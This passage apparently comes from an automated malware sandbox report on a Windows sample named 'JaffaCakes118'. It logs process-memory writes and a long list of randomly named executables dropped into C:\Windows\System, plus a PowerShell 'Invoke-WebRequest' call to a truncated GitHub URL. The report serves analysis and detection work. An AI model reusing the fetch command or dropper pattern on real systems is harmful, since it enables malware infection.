PID 2228 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\fTeHfCd.exe
PID 2228 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\fTeHfCd.exe
PID 2228 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\KmaQKDB.exe
PID 2228 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\KmaQKDB.exe
PID 2228 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\KmaQKDB.exe
PID 2228 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\QrgnCDG.exe
PID 2228 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\QrgnCDG.exe
PID 2228 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\QrgnCDG.exe
PID 2228 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\oUYVDDL.exe
PID 2228 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\oUYVDDL.exe
PID 2228 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\oUYVDDL.exe
PID 2228 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\YcWNsIU.exe
PID 2228 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\YcWNsIU.exe
PID 2228 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\YcWNsIU.exe
PID 2228 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\jPMiWAD.exe
PID 2228 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\jPMiWAD.exe
PID 2228 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\jPMiWAD.exe
PID 2228 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\GRikwIy.exe
PID 2228 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\GRikwIy.exe
PID 2228 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\GRikwIy.exe
PID 2228 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\GreBktc.exe
PID 2228 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\GreBktc.exe
PID 2228 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\GreBktc.exe
PID 2228 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\JYOFxGs.exe
PID 2228 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\JYOFxGs.exe
PID 2228 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\JYOFxGs.exe
PID 2228 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\mqWpNqC.exe
PID 2228 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\mqWpNqC.exe
PID 2228 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\mqWpNqC.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\cymHrrf.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\cymHrrf.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\cymHrrf.exe
PID 2228 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\dEZkFrw.exe
PID 2228 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\dEZkFrw.exe
PID 2228 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\dEZkFrw.exe
PID 2228 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\wLaSZGE.exe
PID 2228 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\wLaSZGE.exe
PID 2228 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\wLaSZGE.exe
PID 2228 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\nyyneJx.exe
PID 2228 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\nyyneJx.exe
PID 2228 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\nyyneJx.exe
PID 2228 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\Hbpsrjt.exe
PID 2228 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\Hbpsrjt.exe
PID 2228 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\Hbpsrjt.exe
PID 2228 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\PMSdxbc.exe
PID 2228 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\PMSdxbc.exe
PID 2228 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\PMSdxbc.exe
PID 2228 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\jNlJgvG.exe
PID 2228 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\jNlJgvG.exe
PID 2228 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\jNlJgvG.exe
PID 2228 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\CewlPdY.exe

Processes

C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\QMiHDMJ.exe

C:\Windows\System\QMiHDMJ.exe

C:\Windows\System\JFKYSSd.exe

C:\Windows\System\JFKYSSd.exe

C:\Windows\System\VJdRBjd.exe

C:\Windows\System\VJdRBjd.exe

C:\Windows\System\fTeHfCd.exe

C:\Windows\System\fTeHfCd.exe

C:\Windows\System\KmaQKDB.exe

C:\Windows\System\KmaQKDB.exe

C:\Windows\System\QrgnCDG.exe

C:\Windows\System\QrgnCDG.exe

C:\Windows\System\oUYVDDL.exe

C:\Windows\System\oUYVDDL.exe

C:\Windows\System\YcWNsIU.exe

C:\Windows\System\YcWNsIU.exe

C:\Windows\System\jPMiWAD.exe

C:\Windows\System\jPMiWAD.exe

C:\Windows\System\GRikwIy.exe

C:\Windows\System\GRikwIy.exe

C:\Windows\System\GreBktc.exe

C:\Windows\System\GreBktc.exe

C:\Windows\System\JYOFxGs.exe

C:\Windows\System\JYOFxGs.exe

C:\Windows\System\mqWpNqC.exe

C:\Windows\System\mqWpNqC.exe

C:\Windows\System\cymHrrf.exe

C:\Windows\System\cymHrrf.exe

C:\Windows\System\dEZkFrw.exe

C:\Windows\System\dEZkFrw.exe

C:\Windows\System\wLaSZGE.exe

C:\Windows\System\wLaSZGE.exe

C:\Windows\System\nyyneJx.exe

C:\Windows\System\nyyneJx.exe

C:\Windows\System\Hbpsrjt.exe

C:\Windows\System\Hbpsrjt.exe

C:\Windows\System\PMSdxbc.exe

C:\Windows\System\PMSdxbc.exe

C:\Windows\System\jNlJgvG.exe

C:\Windows\System\jNlJgvG.exe

C:\Windows\System\CewlPdY.exe

C:\Windows\System\CewlPdY.exe

C:\Windows\System\qZdXNqe.exe

C:\Windows\System\qZdXNqe.exe

C:\Windows\System\shnvFAG.exe

C:\Windows\System\shnvFAG.exe

C:\Windows\System\eQmdmYx.exe

C:\Windows\System\eQmdmYx.exe

C:\Windows\System\UgZzPLf.exe

C:\Windows\System\UgZzPLf.exe

C:\Windows\System\eZxMemu.exe

C:\Windows\System\eZxMemu.exe

C:\Windows\System\AkSWsGt.exe

C:\Windows\System\AkSWsGt.exe

C:\Windows\System\wZMYHvg.exe

C:\Windows\System\wZMYHvg.exe

C:\Windows\System\IRgKnwj.exe

C:\Windows\System\IRgKnwj.exe

C:\Windows\System\BwbzRYy.exe

C:\Windows\System\BwbzRYy.exe

C:\Windows\System\osXYWjB.exe

C:\Windows\System\osXYWjB.exe

C:\Windows\System\WhdzYPE.exe

C:\Windows\System\WhdzYPE.exe

C:\Windows\System\ARAGKtL.exe

C:\Windows\System\ARAGKtL.exe

C:\Windows\System\epvlwLy.exe

C:\Windows\System\epvlwLy.exe

C:\Windows\System\tmINzjj.exe

C:\Windows\System\tmINzjj.exe

C:\Windows\System\hhdxiBX.exe

C:\Windows\System\hhdxiBX.exe

C:\Windows\System\SWbHHsq.exe

C:\Windows\System\SWbHHsq.exe

C:\Windows\System\hxjewgT.exe

C:\Windows\System\hxjewgT.exe

C:\Windows\System\ryNnVxg.exe

C:\Windows\System\ryNnVxg.exe

C:\Windows\System\HLpBcdd.exe

C:\Windows\System\HLpBcdd.exe

C:\Windows\System\WyExZju.exe

C:\Windows\System\WyExZju.exe

C:\Windows\System\nKsmuTM.exe

C:\Windows\System\nKsmuTM.exe

C:\Windows\System\iiAhica.exe

C:\Windows\System\iiAhica.exe

C:\Windows\System\GGifIzJ.exe

C:\Windows\System\GGifIzJ.exe

C:\Windows\System\pZhxMqW.exe

C:\Windows\System\pZhxMqW.exe

C:\Windows\System\HuzDMTd.exe

C:\Windows\System\HuzDMTd.exe

C:\Windows\System\oKHRpUE.exe

C:\Windows\System\oKHRpUE.exe

C:\Windows\System\satPXjX.exe

C:\Windows\System\satPXjX.exe

C:\Windows\System\MmUzhEH.exe

C:\Windows\System\MmUzhEH.exe

C:\Windows\System\gUPXgcg.exe

C:\Windows\System\gUPXgcg.exe

C:\Windows\System\cHiATrU.exe

C:\Windows\System\cHiATrU.exe

C:\Windows\System\zPRRTLR.exe

C:\Windows\System\zPRRTLR.exe

C:\Windows\System\azxMGrq.exe

C:\Windows\System\azxMGrq.exe

C:\Windows\System\Emofegn.exe

C:\Windows\System\Emofegn.exe

C:\Windows\System\QZYuwqQ.exe

C:\Windows\System\QZYuwqQ.exe

C:\Windows\System\YJtWhPU.exe

C:\Windows\System\YJtWhPU.exe

C:\Windows\System\JvvggrR.exe

C:\Windows\System\JvvggrR.exe

C:\Windows\System\tTvkwcN.exe

C:\Windows\System\tTvkwcN.exe

C:\Windows\System\LZwscBT.exe

C:\Windows\System\LZwscBT.exe

C:\Windows\System\siGMXON.exe

C:\Windows\System\siGMXON.exe

C:\Windows\System\LZQEdEd.exe

C:\Windows\System\LZQEdEd.exe

C:\Windows\System\paYUCDl.exe

C:\Windows\System\paYUCDl.exe

C:\Windows\System\bItSKFP.exe

C:\Windows\System\bItSKFP.exe

C:\Windows\System\SnwnfVI.exe

C:\Windows\System\SnwnfVI.exe

C:\Windows\System\niihSCz.exe

C:\Windows\System\niihSCz.exe

C:\Windows\System\IrvXtEU.exe

C:\Windows\System\IrvXtEU.exe

C:\Windows\System\ayEmIud.exe

C:\Windows\System\ayEmIud.exe

C:\Windows\System\ZOIbUnU.exe

C:\Windows\System\ZOIbUnU.exe

C:\Windows\System\hrFOyjn.exe

C:\Windows\System\hrFOyjn.exe

C:\Windows\System\NpHAagG.exe

C:\Windows\System\NpHAagG.exe

C:\Windows\System\SiupfCP.exe

C:\Windows\System\SiupfCP.exe

C:\Windows\System\ogvPFLp.exe

C:\Windows\System\ogvPFLp.exe

C:\Windows\System\rROVthY.exe

C:\Windows\System\rROVthY.exe

C:\Windows\System\NGSkfzx.exe

C:\Windows\System\NGSkfzx.exe

C:\Windows\System\mMYNZWo.exe

C:\Windows\System\mMYNZWo.exe

C:\Windows\System\AhaIhql.exe

C:\Windows\System\AhaIhql.exe

C:\Windows\System\EKqyHvr.exe

C:\Windows\System\EKqyHvr.exe

C:\Windows\System\ZjGICCK.exe

C:\Windows\System\ZjGICCK.exe

C:\Windows\System\etnvXOi.exe

C:\Windows\System\etnvXOi.exe

C:\Windows\System\KeQFUBk.exe

C:\Windows\System\KeQFUBk.exe

C:\Windows\System\ZvLWKLm.exe

C:\Windows\System\ZvLWKLm.exe

C:\Windows\System\PKukWCO.exe

C:\Windows\System\PKukWCO.exe

C:\Windows\System\rPDZOIw.exe

C:\Windows\System\rPDZOIw.exe

C:\Windows\System\KGqXoJV.exe

C:\Windows\System\KGqXoJV.exe

C:\Windows\System\qVlwxhn.exe

C:\Windows\System\qVlwxhn.exe

C:\Windows\System\OTNZuXN.exe

C:\Windows\System\OTNZuXN.exe

C:\Windows\System\uYvFQQa.exe

C:\Windows\System\uYvFQQa.exe

C:\Windows\System\DhKMnaQ.exe

C:\Windows\System\DhKMnaQ.exe

C:\Windows\System\sLFsRxt.exe

C:\Windows\System\sLFsRxt.exe

C:\Windows\System\DbCjRWY.exe

C:\Windows\System\DbCjRWY.exe

C:\Windows\System\jSNMvVg.exe

C:\Windows\System\jSNMvVg.exe

C:\Windows\System\vrZEVlF.exe

C:\Windows\System\vrZEVlF.exe

C:\Windows\System\MBcssWq.exe

C:\Windows\System\MBcssWq.exe

C:\Windows\System\uepTSRG.exe

C:\Windows\System\uepTSRG.exe

C:\Windows\System\XgbkWDL.exe

C:\Windows\System\XgbkWDL.exe

C:\Windows\System\JnFidpo.exe

C:\Windows\System\JnFidpo.exe

C:\Windows\System\voUIuKy.exe

C:\Windows\System\voUIuKy.exe

C:\Windows\System\BRZhYse.exe

C:\Windows\System\BRZhYse.exe

C:\Windows\System\PJoPnpc.exe

C:\Windows\System\PJoPnpc.exe

C:\Windows\System\DurBuUy.exe

C:\Windows\System\DurBuUy.exe

C:\Windows\System\XnoNGNg.exe

C:\Windows\System\XnoNGNg.exe

C:\Windows\System\SgqXJvQ.exe

C:\Windows\System\SgqXJvQ.exe

C:\Windows\System\SnhtEgb.exe

C:\Windows\System\SnhtEgb.exe

C:\Windows\System\sPrIHWg.exe

C:\Windows\System\sPrIHWg.exe

C:\Windows\System\fbBiHoa.exe

C:\Windows\System\fbBiHoa.exe

C:\Windows\System\MzzNDvn.exe

C:\Windows\System\MzzNDvn.exe

C:\Windows\System\pDJUHzS.exe

C:\Windows\System\pDJUHzS.exe

C:\Windows\System\vzsHOEm.exe

C:\Windows\System\vzsHOEm.exe

C:\Windows\System\ATKLcTZ.exe

C:\Windows\System\ATKLcTZ.exe

C:\Windows\System\WrJvCKn.exe

C:\Windows\System\WrJvCKn.exe

C:\Windows\System\MwVckub.exe

C:\Windows\System\MwVckub.exe

C:\Windows\System\VWiNgHS.exe

C:\Windows\System\VWiNgHS.exe

C:\Windows\System\BIlKZcy.exe

C:\Windows\System\BIlKZcy.exe

C:\Windows\System\csFQANy.exe

C:\Windows\System\csFQANy.exe

C:\Windows\System\wootVTW.exe

C:\Windows\System\wootVTW.exe

C:\Windows\System\hmGkzEC.exe

C:\Windows\System\hmGkzEC.exe

C:\Windows\System\QotCcnB.exe

C:\Windows\System\QotCcnB.exe

C:\Windows\System\UMwtoQs.exe

C:\Windows\System\UMwtoQs.exe

C:\Windows\System\TfaRRGs.exe

C:\Windows\System\TfaRRGs.exe

C:\Windows\System\vYWublx.exe

C:\Windows\System\vYWublx.exe

C:\Windows\System\PlKjEFG.exe

C:\Windows\System\PlKjEFG.exe

C:\Windows\System\ZdjRzWj.exe

C:\Windows\System\ZdjRzWj.exe

C:\Windows\System\pjqBCym.exe

C:\Windows\System\pjqBCym.exe

C:\Windows\System\gbmmgQZ.exe

C:\Windows\System\gbmmgQZ.exe

C:\Windows\System\bnxjIpe.exe

C:\Windows\System\bnxjIpe.exe

C:\Windows\System\QfZtCoj.exe

C:\Windows\System\QfZtCoj.exe

C:\Windows\System\SKECeHp.exe

C:\Windows\System\SKECeHp.exe

C:\Windows\System\TmMpMZE.exe

C:\Windows\System\TmMpMZE.exe

C:\Windows\System\pGiTKJH.exe

C:\Windows\System\pGiTKJH.exe

C:\Windows\System\feFvOEG.exe

C:\Windows\System\feFvOEG.exe

C:\Windows\System\ILWkqEp.exe

C:\Windows\System\ILWkqEp.exe

C:\Windows\System\CQKeNAM.exe

C:\Windows\System\CQKeNAM.exe

C:\Windows\System\BEFXFJt.exe

C:\Windows\System\BEFXFJt.exe

C:\Windows\System\BBVFbGo.exe

C:\Windows\System\BBVFbGo.exe

C:\Windows\System\WPgpMJh.exe

C:\Windows\System\WPgpMJh.exe

C:\Windows\System\eirThDu.exe

C:\Windows\System\eirThDu.exe

C:\Windows\System\itxLWbw.exe

C:\Windows\System\itxLWbw.exe

C:\Windows\System\BAEXMcg.exe

C:\Windows\System\BAEXMcg.exe

C:\Windows\System\cNkCSfQ.exe

C:\Windows\System\cNkCSfQ.exe

C:\Windows\System\CpWKPIY.exe

C:\Windows\System\CpWKPIY.exe

C:\Windows\System\EDtEEuk.exe

C:\Windows\System\EDtEEuk.exe

C:\Windows\System\OPWFHuD.exe

C:\Windows\System\OPWFHuD.exe

C:\Windows\System\OweGjPV.exe

C:\Windows\System\OweGjPV.exe

C:\Windows\System\RGIaNSP.exe

C:\Windows\System\RGIaNSP.exe

C:\Windows\System\WXxozWe.exe

C:\Windows\System\WXxozWe.exe

C:\Windows\System\cVIabTW.exe

C:\Windows\System\cVIabTW.exe

C:\Windows\System\oWynNwk.exe

C:\Windows\System\oWynNwk.exe

C:\Windows\System\wSjiJQv.exe

C:\Windows\System\wSjiJQv.exe

C:\Windows\System\XaMpbqe.exe

C:\Windows\System\XaMpbqe.exe

C:\Windows\System\lSdHJpP.exe

C:\Windows\System\lSdHJpP.exe

C:\Windows\System\uefrvVx.exe

C:\Windows\System\uefrvVx.exe

C:\Windows\System\efFxLUD.exe

C:\Windows\System\efFxLUD.exe

C:\Windows\System\fwKFrHt.exe

C:\Windows\System\fwKFrHt.exe

C:\Windows\System\ZqBXPdv.exe

C:\Windows\System\ZqBXPdv.exe

C:\Windows\System\XgGMgHX.exe

C:\Windows\System\XgGMgHX.exe

C:\Windows\System\wDXExMB.exe

C:\Windows\System\wDXExMB.exe

C:\Windows\System\BWishaN.exe

C:\Windows\System\BWishaN.exe

C:\Windows\System\zejuxdv.exe

C:\Windows\System\zejuxdv.exe

C:\Windows\System\CzqgLTO.exe

C:\Windows\System\CzqgLTO.exe

C:\Windows\System\UOEXBWc.exe

C:\Windows\System\UOEXBWc.exe

C:\Windows\System\JeJhGXj.exe

C:\Windows\System\JeJhGXj.exe

C:\Windows\System\NuZCrMb.exe

C:\Windows\System\NuZCrMb.exe

C:\Windows\System\dUmSXqO.exe

C:\Windows\System\dUmSXqO.exe

C:\Windows\System\jddgwzk.exe

C:\Windows\System\jddgwzk.exe

C:\Windows\System\agAgBAO.exe

C:\Windows\System\agAgBAO.exe

C:\Windows\System\KVhHmzL.exe

C:\Windows\System\KVhHmzL.exe

C:\Windows\System\kPanPcB.exe

C:\Windows\System\kPanPcB.exe

C:\Windows\System\uyXpxqP.exe

C:\Windows\System\uyXpxqP.exe

C:\Windows\System\UjFuCWB.exe

C:\Windows\System\UjFuCWB.exe

C:\Windows\System\rdhisqT.exe

C:\Windows\System\rdhisqT.exe

C:\Windows\System\itJorJW.exe

C:\Windows\System\itJorJW.exe

C:\Windows\System\WWyjamM.exe

C:\Windows\System\WWyjamM.exe

C:\Windows\System\EaSCKio.exe

C:\Windows\System\EaSCKio.exe

C:\Windows\System\wmjpBqO.exe

C:\Windows\System\wmjpBqO.exe

C:\Windows\System\nZgHEUE.exe

C:\Windows\System\nZgHEUE.exe

C:\Windows\System\mSmNJCm.exe

C:\Windows\System\mSmNJCm.exe

C:\Windows\System\GxegXhD.exe

C:\Windows\System\GxegXhD.exe

C:\Windows\System\pyQLXeZ.exe

C:\Windows\System\pyQLXeZ.exe

C:\Windows\System\eBMLmPw.exe

C:\Windows\System\eBMLmPw.exe

C:\Windows\System\fiDqAWV.exe

C:\Windows\System\fiDqAWV.exe

C:\Windows\System\TsLyVyI.exe

C:\Windows\System\TsLyVyI.exe

C:\Windows\System\HRMPLQT.exe

C:\Windows\System\HRMPLQT.exe

C:\Windows\System\cIddeje.exe

C:\Windows\System\cIddeje.exe

C:\Windows\System\SgSMdiq.exe

C:\Windows\System\SgSMdiq.exe

C:\Windows\System\wVwGlsJ.exe

C:\Windows\System\wVwGlsJ.exe

C:\Windows\System\hMBktau.exe

C:\Windows\System\hMBktau.exe

C:\Windows\System\zqqcTpS.exe

C:\Windows\System\zqqcTpS.exe

C:\Windows\System\nfeYnbY.exe

C:\Windows\System\nfeYnbY.exe

C:\Windows\System\EKQgiJg.exe

C:\Windows\System\EKQgiJg.exe

C:\Windows\System\qnFJgNU.exe

C:\Windows\System\qnFJgNU.exe

C:\Windows\System\UyUCrGt.exe

C:\Windows\System\UyUCrGt.exe

C:\Windows\System\JhaVEbp.exe

C:\Windows\System\JhaVEbp.exe

C:\Windows\System\iEbwrER.exe

C:\Windows\System\iEbwrER.exe

C:\Windows\System\QWDizfB.exe

C:\Windows\System\QWDizfB.exe

C:\Windows\System\PAtEuMF.exe

C:\Windows\System\PAtEuMF.exe

C:\Windows\System\ugYBAWK.exe

C:\Windows\System\ugYBAWK.exe

C:\Windows\System\bSIxayb.exe

C:\Windows\System\bSIxayb.exe

C:\Windows\System\FoxFOcd.exe

C:\Windows\System\FoxFOcd.exe

C:\Windows\System\uyyQipy.exe

C:\Windows\System\uyyQipy.exe

C:\Windows\System\IAoQhzT.exe

C:\Windows\System\IAoQhzT.exe

C:\Windows\System\ZZDezte.exe

C:\Windows\System\ZZDezte.exe

C:\Windows\System\GuBGlAA.exe

C:\Windows\System\GuBGlAA.exe

C:\Windows\System\PnHdqZA.exe

C:\Windows\System\PnHdqZA.exe

C:\Windows\System\vIKbVKR.exe

C:\Windows\System\vIKbVKR.exe

C:\Windows\System\AkiEwpm.exe

C:\Windows\System\AkiEwpm.exe

C:\Windows\System\ypSykup.exe

C:\Windows\System\ypSykup.exe

C:\Windows\System\RGwxHnr.exe

C:\Windows\System\RGwxHnr.exe

C:\Windows\System\dGfEhGO.exe

C:\Windows\System\dGfEhGO.exe

C:\Windows\System\uNmGZKQ.exe

C:\Windows\System\uNmGZKQ.exe

C:\Windows\System\dYVGsGz.exe

C:\Windows\System\dYVGsGz.exe

C:\Windows\System\KubSEHU.exe

C:\Windows\System\KubSEHU.exe

C:\Windows\System\pcwkqsL.exe

C:\Windows\System\pcwkqsL.exe

C:\Windows\System\gfagzrJ.exe

C:\Windows\System\gfagzrJ.exe

C:\Windows\System\IlFIoon.exe

C:\Windows\System\IlFIoon.exe

C:\Windows\System\SGjUTOC.exe

C:\Windows\System\SGjUTOC.exe

C:\Windows\System\qVGguYq.exe

C:\Windows\System\qVGguYq.exe

C:\Windows\System\xguFvLv.exe

C:\Windows\System\xguFvLv.exe

C:\Windows\System\FpuhUrt.exe

C:\Windows\System\FpuhUrt.exe

C:\Windows\System\QbxNpHu.exe

C:\Windows\System\QbxNpHu.exe

C:\Windows\System\FSxAejz.exe

C:\Windows\System\FSxAejz.exe

C:\Windows\System\iPqiBVl.exe

C:\Windows\System\iPqiBVl.exe

C:\Windows\System\KFucdPe.exe

C:\Windows\System\KFucdPe.exe

C:\Windows\System\bYycsEP.exe

C:\Windows\System\bYycsEP.exe

C:\Windows\System\tylOwqJ.exe

C:\Windows\System\tylOwqJ.exe

C:\Windows\System\NeZaAlG.exe

C:\Windows\System\NeZaAlG.exe

C:\Windows\System\rcPNGiM.exe

C:\Windows\System\rcPNGiM.exe

C:\Windows\System\VcTrZiE.exe

C:\Windows\System\VcTrZiE.exe

C:\Windows\System\DCjCcPv.exe

C:\Windows\System\DCjCcPv.exe

C:\Windows\System\ybSlOuk.exe

C:\Windows\System\ybSlOuk.exe

C:\Windows\System\lJMMZok.exe

C:\Windows\System\lJMMZok.exe

C:\Windows\System\ByGMYRE.exe

C:\Windows\System\ByGMYRE.exe

C:\Windows\System\FLBHmJW.exe

C:\Windows\System\FLBHmJW.exe

C:\Windows\System\gOmiSEK.exe

C:\Windows\System\gOmiSEK.exe

C:\Windows\System\uXBgIva.exe

C:\Windows\System\uXBgIva.exe

C:\Windows\System\bHTyTNW.exe

C:\Windows\System\bHTyTNW.exe

C:\Windows\System\RAUfHwE.exe

C:\Windows\System\RAUfHwE.exe

C:\Windows\System\BlwLszM.exe

C:\Windows\System\BlwLszM.exe

C:\Windows\System\eIKktvM.exe

C:\Windows\System\eIKktvM.exe

C:\Windows\System\movlpkn.exe

C:\Windows\System\movlpkn.exe

C:\Windows\System\lTfaZTt.exe

C:\Windows\System\lTfaZTt.exe

C:\Windows\System\NlMCeDa.exe

C:\Windows\System\NlMCeDa.exe

C:\Windows\System\sIKbRts.exe

C:\Windows\System\sIKbRts.exe

C:\Windows\System\JAGfCpq.exe

C:\Windows\System\JAGfCpq.exe

C:\Windows\System\caovHkG.exe

C:\Windows\System\caovHkG.exe

C:\Windows\System\bqkPVUE.exe

C:\Windows\System\bqkPVUE.exe

C:\Windows\System\IdkYDxM.exe

C:\Windows\System\IdkYDxM.exe

C:\Windows\System\pbHUFpe.exe

C:\Windows\System\pbHUFpe.exe

C:\Windows\System\mlUYGqI.exe

C:\Windows\System\mlUYGqI.exe

C:\Windows\System\bYzocUz.exe

C:\Windows\System\bYzocUz.exe

C:\Windows\System\fYRhWRc.exe

C:\Windows\System\fYRhWRc.exe

C:\Windows\System\bhQkLDd.exe

C:\Windows\System\bhQkLDd.exe

C:\Windows\System\KJSZWvF.exe

C:\Windows\System\KJSZWvF.exe

C:\Windows\System\WOROYDh.exe

